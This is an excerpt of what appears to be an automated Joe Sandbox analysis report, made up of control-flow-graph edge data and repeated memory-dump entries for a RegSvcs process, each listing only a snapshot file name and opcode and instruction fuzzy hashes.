1019 6bbd8cc-6bbd8e3 1018->1019 1021 6bbd8f2-6bbd90d 1019->1021 1022 6bbd8e5-6bbd8f0 1019->1022 1021->1015 1027 6bbd913-6bbd92c call 6bb6608 1021->1027 1022->1021 1031 6bbd93b-6bbd944 1027->1031 1032 6bbd92e-6bbd933 1027->1032 1031->798 1033 6bbd94a-6bbd99e 1031->1033 1032->1031 1033->1015
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a39baaf97ffea02fbb0e3da639997ba8e380f8b5234db9e5a99cd56ab1526cca
                          • Instruction ID: 7f2ce6afce39002e13781b0159c47985ac8efc8bb2f2b48ce31bfb117c98acb4
                          • Opcode Fuzzy Hash: a39baaf97ffea02fbb0e3da639997ba8e380f8b5234db9e5a99cd56ab1526cca
                          • Instruction Fuzzy Hash: 74627FB0A002098FDB15DF68D590AADB7F6FF88700F249A69D0069F365DB75EC46CB81

                          Control-flow Graph
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: abc29401acd5b64dc8fd3714b61cfbfd4a3e316720ad97e68ecb6c182dec4c04
                          • Instruction ID: 02ea21391700ab20a3b77448a1b5f112c570e82f7ab6740bbac64a657a312278
                          • Opcode Fuzzy Hash: abc29401acd5b64dc8fd3714b61cfbfd4a3e316720ad97e68ecb6c182dec4c04
                          • Instruction Fuzzy Hash: 91028FB0E002098FDB64CB69D580AFDB7B2FB89310F10A9AAD456DB251DFB4DC41CB91

                          Control-flow Graph
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4341d73417078cc1720fb35a0e3e0aa4eabbd6903061ebaf6f8e622c1a2981ff
                          • Instruction ID: 9f78ffd5240b18ef1fad608928586440d59688f1ed77e9a91e48a89253d41248
                          • Opcode Fuzzy Hash: 4341d73417078cc1720fb35a0e3e0aa4eabbd6903061ebaf6f8e622c1a2981ff
                          • Instruction Fuzzy Hash: 27E15BB0E102098FDB64DB69D4906FEB7B6EB88300F20956AD406EB354DBB5DC42CB91
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2074c771029377bc10e13a9f6a1d314fde319598400a1d7cc296be5cf0d0ca5
                          • Instruction ID: 4e1f0f5a3df278fe2a3975c91b603a9916748079bd22f4a52c5e1e2870407188
                          • Opcode Fuzzy Hash: a2074c771029377bc10e13a9f6a1d314fde319598400a1d7cc296be5cf0d0ca5
                          • Instruction Fuzzy Hash: 68915170B0021A8FDB64EB65D8607BEB7B6FF89300F1494A9C549EB354EF759C418B90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e2e2725e92fb5abd5f47d174c9ab84f856058b366208e556bf87d8fd4d8e273
                          • Instruction ID: 7ec6f9f5aee3c5f8269d1ccf34c1212c3c5e0f608c489a667e7e5ceeca668960
                          • Opcode Fuzzy Hash: 5e2e2725e92fb5abd5f47d174c9ab84f856058b366208e556bf87d8fd4d8e273
                          • Instruction Fuzzy Hash: 3861E6B1F001114BEF259B6EC9549AEBBE7EFC4620B194479D40ADB360EEB5DC0287D1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7404ed7c2e6db5d3b43590aa608a27152e6f8cd6779f0dea0d846ce4f3ec76e
                          • Instruction ID: 47bd40bcd4090f20cb2e3700f051471a13a575a15a29e518b05946c51a713d3e
                          • Opcode Fuzzy Hash: c7404ed7c2e6db5d3b43590aa608a27152e6f8cd6779f0dea0d846ce4f3ec76e
                          • Instruction Fuzzy Hash: 3A815E70B002058FDF54DFA8C5A47AEB7F6EB89310F149469D40AEB399EB74DC428B91
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f771f6f6d970e478b3c81644c21b0b55f1539755c21a35a0d49398d2bd5a9a02
                          • Instruction ID: 6d3abcf6fe900453cb8be68f94861745fe2291ba6fc1deee86f587b3eb22ebdc
                          • Opcode Fuzzy Hash: f771f6f6d970e478b3c81644c21b0b55f1539755c21a35a0d49398d2bd5a9a02
                          • Instruction Fuzzy Hash: 3A914D70E102198FDF60DFA8C890BDDB7B1FF89300F209599D549AB295DB70AA85CF91
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a27670ab965f9a053d2d8b097558423e47baf35658dd8928aeecded8b3a0a726
                          • Instruction ID: 65047ab0e9b611f39a742784d37dbf85b14d6d2c59630e58a16e6af99e81b434
                          • Opcode Fuzzy Hash: a27670ab965f9a053d2d8b097558423e47baf35658dd8928aeecded8b3a0a726
                          • Instruction Fuzzy Hash: 53913C70E102198BDF60DFA8C880BDDB7B1FF89300F209599D549BB255DB71AA85CF90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7bbc67f93b83aff8f4d0cdfe8a45b75de30d7b6bda68da4b4dd8882bc66dc35
                          • Instruction ID: bcc4364d85485159e8c60f43fd553e3b90824a592bee1c472d8cdde1c84cdcb5
                          • Opcode Fuzzy Hash: e7bbc67f93b83aff8f4d0cdfe8a45b75de30d7b6bda68da4b4dd8882bc66dc35
                          • Instruction Fuzzy Hash: 74713AB0A002099FDB54DFA9D990AEDBBF6FF88300F149569D015AB265DBB4EC42CB50
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21bd61e24dc4d37afc692f287b6c58a817e73b5b66e626007ab551727ec0e497
                          • Instruction ID: 6dd67efb1955031e0ec89e6564ccc8b7b530efd8399320c8597b3e61e40f248a
                          • Opcode Fuzzy Hash: 21bd61e24dc4d37afc692f287b6c58a817e73b5b66e626007ab551727ec0e497
                          • Instruction Fuzzy Hash: B37139B0A002099FDB54DFA9D990AEDBBF6FF88300F149569D005AB365DBB4EC46CB50
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b44b9ed43faf393a3e11c6141b25e521b18cacdb38c6b7b5190caa405ba00621
                          • Instruction ID: 3e540667c2e3cb74960ca6edafa25caf1ef68d3268813b9e28fa1413ddc00018
                          • Opcode Fuzzy Hash: b44b9ed43faf393a3e11c6141b25e521b18cacdb38c6b7b5190caa405ba00621
                          • Instruction Fuzzy Hash: 15618170F002099FEF549FB5D8547AEBBF6FB88700F20846AD106AB395DBB55C458B90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d5888745b85b1d40dfc63d582d3cf9dd3254a7b7022e2ef5afbe4f465475f4b
                          • Instruction ID: 08645b3ca56c623ece367b1f885cafce5b74e481e5d5b6ec1cd634f87b73eb0f
                          • Opcode Fuzzy Hash: 5d5888745b85b1d40dfc63d582d3cf9dd3254a7b7022e2ef5afbe4f465475f4b
                          • Instruction Fuzzy Hash: A751F1B1E00209DFDF64AF78E8542BDB7B6EF89311F1098AAE106D7251DB758845CB80
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e3ef365bc11b10b7e5fc47ffa19e4531c7eab6a49d54b3fbb6c54a37c7b7b4c
                          • Instruction ID: 434c28b9557613c45a5c1b854e287473d1d6578a3c4c5d4e714b2c273b610f5d
                          • Opcode Fuzzy Hash: 7e3ef365bc11b10b7e5fc47ffa19e4531c7eab6a49d54b3fbb6c54a37c7b7b4c
                          • Instruction Fuzzy Hash: CC51C9B0B102149BFF649668DC647BF366EE78D350F20646AD50BC73A5C9BDCC4187A2
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f59cb5b2413d289e8625e4b74780e096075ce2ca14020880ea70e0f4cb65bf91
                          • Instruction ID: a22fa0b56f955ded2850f2fb8f4d453c0a3ca5967d3ed888135a5a7853f5f485
                          • Opcode Fuzzy Hash: f59cb5b2413d289e8625e4b74780e096075ce2ca14020880ea70e0f4cb65bf91
                          • Instruction Fuzzy Hash: CE51B9B0B102149BFF649668DC647BF366EE78D310F20646AD50BC73A5C9BDCC4197A2
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce1db8724a8d6970f7fbcc2cd47e174d2958eec68260a4f04628b933697b0d2f
                          • Instruction ID: 87b62526bef7b404dc884e23d5e1e08f6f42c3629c38e1bedba03795fc29dd64
                          • Opcode Fuzzy Hash: ce1db8724a8d6970f7fbcc2cd47e174d2958eec68260a4f04628b933697b0d2f
                          • Instruction Fuzzy Hash: C2517F70B001058FDB58EB78D8A0BBEB7F6EB89700F54946AC549EB394DF759C018BA0
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 36b7ea8fbf1de7bdef8c6b8af9bf4e3e1ca0f6dd0f94c5fbe229fcb5cbf8d84a
                          • Instruction ID: 710e36217e66c9b3de9d7834b3d16ca2770f7f1af483ef70fb433a42eaa076a6
                          • Opcode Fuzzy Hash: 36b7ea8fbf1de7bdef8c6b8af9bf4e3e1ca0f6dd0f94c5fbe229fcb5cbf8d84a
                          • Instruction Fuzzy Hash: 53516170F002199FEB549FA5C854BAEBBF6FF88700F208529D105AB395DA759C458B90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f85c8a25c60cf075e6e1592e249ea36986ec488bd66ad398b8f834648554543a
                          • Instruction ID: dd5f288977bc2314ea82c975f5f8cf2f9807d7848671051fe4585cdb18c0c522
                          • Opcode Fuzzy Hash: f85c8a25c60cf075e6e1592e249ea36986ec488bd66ad398b8f834648554543a
                          • Instruction Fuzzy Hash: ED417EB2E006098FDB70CFA9D880BFFB7B2EB44210F10596AE216D7650D771E8458B96
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba316d556de5993e548ffe4e84b1f83ce551a84f85f47b22fe5fcd6292365eef
                          • Instruction ID: 9b3259aa0548f9a720d1e5c1e3a4bea0d21f7bae2ce15fb692e0d6faefc8b29a
                          • Opcode Fuzzy Hash: ba316d556de5993e548ffe4e84b1f83ce551a84f85f47b22fe5fcd6292365eef
                          • Instruction Fuzzy Hash: BD4199B6F102458FDF708F6AC4807BEBBB2EB45310F14E8AAD156DB641C6B5D841CB92
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4640d4a99f36e138f1d05ac8dd78cec17c1cac4d4dd341a5cd669d64705a8d5
                          • Instruction ID: 40a652495ed7ddbcfa65567c83dec19d4692c3dd1d82b50754c1dba13ebd56ba
                          • Opcode Fuzzy Hash: a4640d4a99f36e138f1d05ac8dd78cec17c1cac4d4dd341a5cd669d64705a8d5
                          • Instruction Fuzzy Hash: A5419EB0E007099FDB60DFA5D4946AEBBB6FF85700F10556AD405EB240DBB9D842CB91
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9d7a2a0ccfa800dea858a594e3c99942fda82764e055b6e73c213107e3e4226e
                          • Instruction ID: e01a242d7ba924b3cf9910044e8a4281a71be50fc4c15f7661e91ddad709c89e
                          • Opcode Fuzzy Hash: 9d7a2a0ccfa800dea858a594e3c99942fda82764e055b6e73c213107e3e4226e
                          • Instruction Fuzzy Hash: D831CE70B002018FDB68AB74D4546BE7BB6EB89710F1464A9D402DB3A5DF75CD05C7A1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebaa91a9d16c03ae47944bb650f378d69302efcd52c887ae1e4d005d442e63cf
                          • Instruction ID: 43af79c1fd95a2f1d9daccefd248d1a6e08f98c3af2d0eacf5a3f229cad9b5fa
                          • Opcode Fuzzy Hash: ebaa91a9d16c03ae47944bb650f378d69302efcd52c887ae1e4d005d442e63cf
                          • Instruction Fuzzy Hash: 9C31D070B002058FDBA8AB74D4586BF7BA6EF89710F14A46DD402EB365DE75CD02CB91
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05f5b462de39aba50b87d4a9d0864ca1323b79ae901b297df0fb29e9c3da06a2
                          • Instruction ID: 5cdd81108016db2adca6c6967487582b985edd46b060593cf9374b7a78334e60
                          • Opcode Fuzzy Hash: 05f5b462de39aba50b87d4a9d0864ca1323b79ae901b297df0fb29e9c3da06a2
                          • Instruction Fuzzy Hash: 69319470E103099FDB24DF65D490AEEB7B6FF89300F109969E505AB210DBB4E9468B91
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae2737dcfb21fec59073b67a05f6137f8d2da7de691e47b8e95ee40884a6036d
                          • Instruction ID: 6a6c2327e534c6f144eb2f41504480679a0e11b6b3fb57666d8ffca03bf4c1ca
                          • Opcode Fuzzy Hash: ae2737dcfb21fec59073b67a05f6137f8d2da7de691e47b8e95ee40884a6036d
                          • Instruction Fuzzy Hash: 34318F71E102069FCB59CF64C894ABEB7B2FF89700F109529E906E7750EB71AD42CB50
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e2275e48536d94a1e9d39f8f3fddf3650d27bcdd1aca680c18e3776e3691560b
                          • Instruction ID: 44a3f9751cfc9583aead1005ffd1bc9b4f97f6212ba192915cc12fd0ca34dff5
                          • Opcode Fuzzy Hash: e2275e48536d94a1e9d39f8f3fddf3650d27bcdd1aca680c18e3776e3691560b
                          • Instruction Fuzzy Hash: 82317C70E102099BCB59CF64C894AAEB7F2FF89700F109529E906E7750EBB1ED42CB50
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c2014efa1a06a1db616acef816bd9ce205521cc251a8be2809c97d01123ce832
                          • Instruction ID: 99730cf231e99063b29859e2fbc03e03664534309b3c181f43b99b18ae53d6c8
                          • Opcode Fuzzy Hash: c2014efa1a06a1db616acef816bd9ce205521cc251a8be2809c97d01123ce832
                          • Instruction Fuzzy Hash: 33318DB1F002149FDB50DFA9D880AEEBBF5EB48710F10906AE901EB380E774DC418BA4
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd63d11c7f196f878062f65eb4c6785efd23b2005458c42941f57eaf81c1132c
                          • Instruction ID: 26d9210bbe80a16d6ee6de9779afbf249073e547119c55903804470c0e691fc5
                          • Opcode Fuzzy Hash: bd63d11c7f196f878062f65eb4c6785efd23b2005458c42941f57eaf81c1132c
                          • Instruction Fuzzy Hash: 89217CB5F006149FDB60DFA9D880AEEBBF5EB48710F109069E905E7390EB74DC408BA4
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60732b00aaabae5877e964bd785b8cae7ef4155d67c4cb56d0d2300552052a92
                          • Instruction ID: a04760a793124345a947aa2a03df469556a1deb277f20a6c67df7ba6c6dd9bea
                          • Opcode Fuzzy Hash: 60732b00aaabae5877e964bd785b8cae7ef4155d67c4cb56d0d2300552052a92
                          • Instruction Fuzzy Hash: 36118E72B042289BCF599A78DC646FE77FAEBC9311F04557AC406E7340EE65DC028BA1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9ce90721991329f8b9d8cb9123d556af21b551b033289a78b2c1b193d5c5506
                          • Instruction ID: 3f36089caf8f02deeb0fa8c3343d346e7f3177ca04b6e2aef03d34087c82913d
                          • Opcode Fuzzy Hash: c9ce90721991329f8b9d8cb9123d556af21b551b033289a78b2c1b193d5c5506
                          • Instruction Fuzzy Hash: 6B01B171F001105FCB659A68D850BAEB7EAEB8A750F10A47AE14ACB352DF31DC028391
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a0f59415ada9d00159b3439de59037fb8ced29f7cda39ea4ed9fddbfd6cccb9
                          • Instruction ID: e349dde02f14dee155c761a899fd477c47c7d841c63a82bc5c825064d62907cb
                          • Opcode Fuzzy Hash: 5a0f59415ada9d00159b3439de59037fb8ced29f7cda39ea4ed9fddbfd6cccb9
                          • Instruction Fuzzy Hash: 5D21C0B5D01219AFDB00DF9AD884ADEFBB8FB49310F10812AE918A7641D374A944CBA5
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 34596beb5f3eebbc5eba1bfb898e4eaf1da6e89030a159dd4e1870734aed3d8b
                          • Instruction ID: f17086b7e55fe5f6f66d786b088ac8c01995afa36d6730b1aca0010c930af5e5
                          • Opcode Fuzzy Hash: 34596beb5f3eebbc5eba1bfb898e4eaf1da6e89030a159dd4e1870734aed3d8b
                          • Instruction Fuzzy Hash: C501FC71B041100FDB6596BD941076FB7E6DBC9B10F14947DE20ACB397EAA1CD414391
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9086e60ec7db9716d60b60b1b0ea6f88a1238acf860b9bd20e32e82f3098f0c7
                          • Instruction ID: e6e78c6d7c3ba970b99bb97fb0569dc149a0394fe9335357fda2741fc1595156
                          • Opcode Fuzzy Hash: 9086e60ec7db9716d60b60b1b0ea6f88a1238acf860b9bd20e32e82f3098f0c7
                          • Instruction Fuzzy Hash: 8E01D476B141245BCB989968DC246FB73EBDBC9310F04513AD006D7380DE65CC0247E1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1955605a3451bcb0fa154e5eadfd34ae9f7a6ea063488476c725868c4cbeb41c
                          • Instruction ID: 5446b0ee39e5f137bf6b10c41f9798f31b26df36ff9d0db04536204b8dc60f55
                          • Opcode Fuzzy Hash: 1955605a3451bcb0fa154e5eadfd34ae9f7a6ea063488476c725868c4cbeb41c
                          • Instruction Fuzzy Hash: 42012431B141010BCBA59A3DA850BBF77D6DBCA750F14987DE10AC7352DA61DC024395
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8d394da3863829acaf11e1a46cac32f282cf27ab12c8cfa32232f507c69ff69
                          • Instruction ID: 499f076d8b95f9aef6b77b3185e4e0d1784103cf48cfb420439258652d18f7a6
                          • Opcode Fuzzy Hash: d8d394da3863829acaf11e1a46cac32f282cf27ab12c8cfa32232f507c69ff69
                          • Instruction Fuzzy Hash: E711CFB5D01219AFDB00CF9AD884ADEFBB8FB49310F10812AE918A7241D374A944CFA5
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc186df1b40f2d2826df7ad11c71afd357c22f079e6652cca458bd391ee31bf4
                          • Instruction ID: bbe7f5e5116507c8bee6f90115ba3cfc30d661783ff67a557242dd2d45e7b163
                          • Opcode Fuzzy Hash: bc186df1b40f2d2826df7ad11c71afd357c22f079e6652cca458bd391ee31bf4
                          • Instruction Fuzzy Hash: 2701D171B001100BDB659AADD450B6FB3DAEBC9B20F14A83DE20AC7386EEA1DC420391
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 74b1aafe377a9441555b334f4311e5180c18904cbc73899539c23b14ebbb74fd
                          • Instruction ID: e13eba78dabf92162f18bad722394a40baa46d0c1974d4433442449c5402ff3d
                          • Opcode Fuzzy Hash: 74b1aafe377a9441555b334f4311e5180c18904cbc73899539c23b14ebbb74fd
                          • Instruction Fuzzy Hash: 5C01D171B101100BDBA5996EA450BBF73D6D7CD751F14983DE10AC7351EF61DC024395
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f926248ee721cee0c2f06b20cba55d56deed138b43006337e7bbd7afc645bd63
                          • Instruction ID: 2b9b26414ee2acf47252a4729339d999fc38c8e796217475d03f85d9fd65ea69
                          • Opcode Fuzzy Hash: f926248ee721cee0c2f06b20cba55d56deed138b43006337e7bbd7afc645bd63
                          • Instruction Fuzzy Hash: 13016970F101144BDB64EA68E454B6EB3EAEB89710F10A83EE50AC7391EA76DC428380
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8849a89ce69aae6873fdf56867be421ac7749de6d547801d367d5a99d5036de
                          • Instruction ID: a26b2989ac602f25e5a96d30094cdfd462d9eb53bc58ea7eecf2550513daf65b
